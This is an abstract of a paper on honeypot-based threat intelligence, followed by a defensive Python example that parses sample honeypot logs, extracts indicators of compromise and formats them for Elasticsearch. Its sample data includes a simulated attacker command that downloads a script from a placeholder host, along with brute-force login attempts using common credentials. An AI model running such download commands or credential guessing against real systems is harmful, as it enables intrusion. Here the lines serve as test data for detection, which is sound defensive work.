Analysis of Honeypot Data utilizing Elasticsearch for Cyber Threat Intelligence
Cyber-attacks arrive continuously, and security specialists must identify, investigate and defend against them as they happen. Handling such a volume of attacks in a timely manner is not feasible without thoroughly analysing the characteristics of each threat and taking informed protective measures; this is what is meant by cyber threat intelligence. The task is not simple, however, because intrusion detection systems (IDSs) generate a large number of alerts, many of which are incorrect, so analysts are left with a large number of false positives. Cyber threats cannot be avoided by existing tools and techniques alone. Instead, the attacker's intent has to be assessed through means such as Indicators of Compromise (IoCs). In this article, a threat intelligence technique is proposed that examines honeypot log data to detect the attacker's activities and to identify the attacker's target. To accomplish this, a honeypot was deployed in the AWS cloud to collect cyber-incident logs, and Elasticsearch was used to analyse the log data.
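The pipeline the abstract describes has three stages: collect raw honeypot events, turn them into structured documents that Elasticsearch can index, and aggregate IoCs (attacking IPs, credentials tried, payload URLs) from those documents. The following is an added example, not code from the paper, that carries a batch of constructed honeypot log lines through all three stages offline. The log format, the field names and the index name `honeypot` are assumptions; the only real interface it targets is the newline-delimited action/document layout of the Elasticsearch `_bulk` API.

```python
import json
import re
from collections import Counter

# Constructed sample lines in a hypothetical honeypot log format
# (an assumption for this example, not the paper's data):
# "<ISO timestamp> <src_ip>:<src_port> <event> [key=value ...]"
SAMPLE_LOGS = [
    "2024-03-01T10:00:01Z 203.0.113.7:51234 login_failed user=root pass=123456",
    "2024-03-01T10:00:03Z 203.0.113.7:51236 login_failed user=root pass=admin",
    "2024-03-01T10:00:05Z 203.0.113.7:51238 login_success user=root pass=toor",
    "2024-03-01T10:00:06Z 203.0.113.7:51238 command cmd=wget http://198.51.100.9/x.sh",
    "2024-03-01T10:01:00Z 198.51.100.22:40000 login_failed user=admin pass=admin",
    "2024-03-01T10:01:02Z 198.51.100.22:40002 login_failed user=admin pass=password",
    "garbage line that does not match the format",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) "
    r"(?P<event>\w+)(?: (?P<detail>.*))?$"
)
KV_RE = re.compile(r"(\w+)=(\S+)")
URL_RE = re.compile(r"https?://\S+")


def parse_line(line):
    """Turn one raw line into an ECS-style dict, or None if the line is malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    detail = m.group("detail") or ""
    doc = {
        "@timestamp": m.group("ts"),
        "source": {"ip": m.group("ip"), "port": int(m.group("port"))},
        "event": {"action": m.group("event")},
    }
    if m.group("event") == "command":
        # Keep the whole command line; URLs inside it are download IoCs.
        doc["process"] = {"command_line": detail[4:] if detail.startswith("cmd=") else detail}
    else:
        kv = dict(KV_RE.findall(detail))
        if "user" in kv:
            doc["user"] = {"name": kv["user"]}
        if "pass" in kv:
            doc["password"] = kv["pass"]
    return doc


def parse_logs(lines):
    """Parse a batch of lines, silently dropping malformed ones."""
    return [d for d in (parse_line(line) for line in lines) if d is not None]


def extract_iocs(docs):
    """Aggregate indicators across parsed events: attacking IPs, failed-login
    counts per IP, credentials tried, and URLs fetched after a successful login."""
    iocs = {
        "source_ips": Counter(),
        "failed_logins": Counter(),
        "credentials": Counter(),
        "urls": set(),
    }
    for d in docs:
        ip = d["source"]["ip"]
        action = d["event"]["action"]
        iocs["source_ips"][ip] += 1
        if action == "login_failed":
            iocs["failed_logins"][ip] += 1
        if action in ("login_failed", "login_success") and "user" in d:
            iocs["credentials"][f'{d["user"]["name"]}:{d.get("password", "")}'] += 1
        if action == "command":
            iocs["urls"].update(URL_RE.findall(d["process"]["command_line"]))
    return iocs


def to_bulk_ndjson(docs, index="honeypot"):
    """Serialise documents in the Elasticsearch _bulk API format: an action
    line followed by the document, newline-delimited, ending with a newline."""
    out = []
    for d in docs:
        out.append(json.dumps({"index": {"_index": index}}))
        out.append(json.dumps(d))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    parsed = parse_logs(SAMPLE_LOGS)
    indicators = extract_iocs(parsed)
    print("events indexed:", len(parsed))
    print("top attacking IPs:", indicators["source_ips"].most_common(3))
    print("failed logins per IP:", dict(indicators["failed_logins"]))
    print("credentials tried:", dict(indicators["credentials"]))
    print("download URLs:", sorted(indicators["urls"]))
    print(to_bulk_ndjson(parsed), end="")
```

The string returned by `to_bulk_ndjson` is exactly what would be POSTed to `/_bulk` with a `Content-Type: application/x-ndjson` header; the same aggregations can then be reproduced in Elasticsearch with a `terms` aggregation on `source.ip` and a filter on `event.action`. Malformed lines are dropped rather than raising, since a honeypot feed routinely contains attacker-controlled bytes that do not fit any schema.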